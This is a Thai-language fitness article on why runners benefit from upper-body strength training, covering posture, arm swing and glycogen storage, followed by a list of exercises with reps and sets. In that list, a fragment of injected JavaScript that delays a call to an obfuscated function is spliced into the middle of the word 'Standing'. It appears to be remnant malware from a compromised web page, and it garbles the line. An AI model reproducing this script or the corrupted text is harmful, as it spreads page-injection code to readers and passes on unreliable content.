แน่นอนว่าการฝึกกล้ามเนื้อช่วงล่าง อย่าง เอว เข่าและข้อเท้าจะช่วยให้กล้ามเนื้อขาที่ใช้วิ่งของนักวิ่งมีความแข็งแรง มีความอึดถึกทนมากขึ้น (Endurance) สามารถรับจำนวนกิโลเมตรที่วิ่งเพิ่มขึ้นได้ (Mileage) มีพลังในการผลักดันไปได้เร็วและแรง (Power) แล้วดังนั้นเราควรโฟกัสการฝึกไปที่กล้ามเนื้อช่วงล่างไม่ดีกว่าหรือ….?
ถ้านักวิ่งคิดว่าการฝึกกล้ามเนื้อช่วงบน อย่าง หน้าอก หลังไหล่และแขน (Upper Body) ไม่สำคัญ นั้นคือนักวิ่งจะพลาดโอกาสสำคัญในการพัฒนา Performance
3 เหตุผลที่นักวิ่งควรฝึก Upper body training
สาเหตุที่เราควรฝึกกล้ามเนื้อส่วน Upper body นั้นได้แก่…
1. ปรับให้ Posture การวิ่งดีขึ้น
ในโลกเราไม่มีนักวิ่งคนไหนในโลกที่มีฟอร์มการวิ่งที่เหมือนกัน แต่การมี Upper body ที่ดีจะช่วยให้วิ่งได้ยาวนานมากขึ้นดีต่อการแข่งขันระยะทางไกล กล้ามเนื้อ Upper body ที่แข็งแรงจะช่วยดึงให้อกผายไหล่ผึ่ง ดึงลำตัวให้ตรงเป็นแกนกลางที่มั่นคง เพราะยิ่งมี Posture ที่ดีจะทำให้การวิ่งดียิ่งขึ้น (Performance) เราจะดึงประสิทธิภาพในการวิ่งได้มากที่สุดเมื่อเรามีฟอร์มการวิ่งที่ดี การฝึกบริหารกล้ามเนื้อจะทำให้เรามีความต่อเนื่องในการรักษาฟอร์ม สามารถรักษาการจัดระเบียบร่างกายได้ดี
2. สวิงแขนได้ดีขึ้น
ถามว่าแกว่งแขนเกี่ยวอะไรกับการวิ่ง การแกว่งแขนจะสัมพันธ์กับจังหวะการวิ่งหรือจังหวะการสับขา ยิ่งมีเร็ว จะสังเกตได้ว่าแขนจะแกว่งเร็วตามไปด้วย แต่สำหรับการวิ่งระยะไกล เราคงไม่อยากแกว่งแขนมากเพราะมันจะเปลืองพลังงาน
การแกว่งแขนได้ดีนั้นคือต้องมีกล้ามเนื้อไหล่และแขนที่แข็งแรง ซึ่งจะทำให้เราสามารถรักษาจังหวะการวิ่งได้นิ่งและมั่นคง ถ้ากล้ามเนื้อแขนไหล่ไม่แข็งแรง เราจะสูญเสียฟอร์มการวิ่งและจังหวะการวิ่ง
3. เพิ่มพื้นที่เก็บไกลโคเจน
อย่างที่ทราบกันดี ไกลโคเจนเป็นแหล่งพลังงานที่เก็บสะสมไว้ที่กล้ามเนื้อและตับ เมื่อไกลโคเจนหมด ร่างกายก็เหมือนหมดน้ำมัน ไม่ต่อไม่รอด เพื่อสร้างแหล่งพลังงานสะสมให้มีมากขึ้น มีถังจุน้ำมันใหญ่ขึ้น การฝึกกล้ามเนื้อให้มีขนาดใหญ่ขึ้นจึงเป็นสิ่งที่จำเป็น
ตัวอย่างการฝึกเพิ่มกล้าเนื้อช่วงบนได้แก่
วิดพื้น (Pushups) ทำ 8-10 ครั้ง จำนวน 4 เซต

Inverted rows ทำ 10-12 ครั้ง จำนวน 4 เซต

Dumbbell bench press ทำ 8–10 ครั้ง 3 เซต

1-Arm dumbbell rows ทำข้างละ 10–12 ครั้ง 3 เซต

Standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding triceps pushdowns ทำ 15–20 ครั้ง 3 เซต
Dumbbell hammer curls ทำ 12–15 ครั้ง 3 เซต

สังเกตนะครับว่า…เพื่อสร้างกล้ามเนื้อช่วงบนลำตัวให้เป็นแหล่งพลังงานเพื่อเติมให้ร่างกาย เราจะโฟกัสฝึกมัดกล้ามเนื้อ อันได้แก่ กล้ามเนื้ออก แผ่นหลัง ไหล่และแขน ทั้งนี้นอกจากการฝึกบริหารกล้ามเนื้อแล้วก็อย่าลืมรับประทานแป้งและโปรตีนด้วย เพื่อให้มีสารอาหารไปซ่อมแซมและเสริมสร้างกล้ามเนื้อและพลังงานด้วย
อ้างอิง blog.mapmyrun.com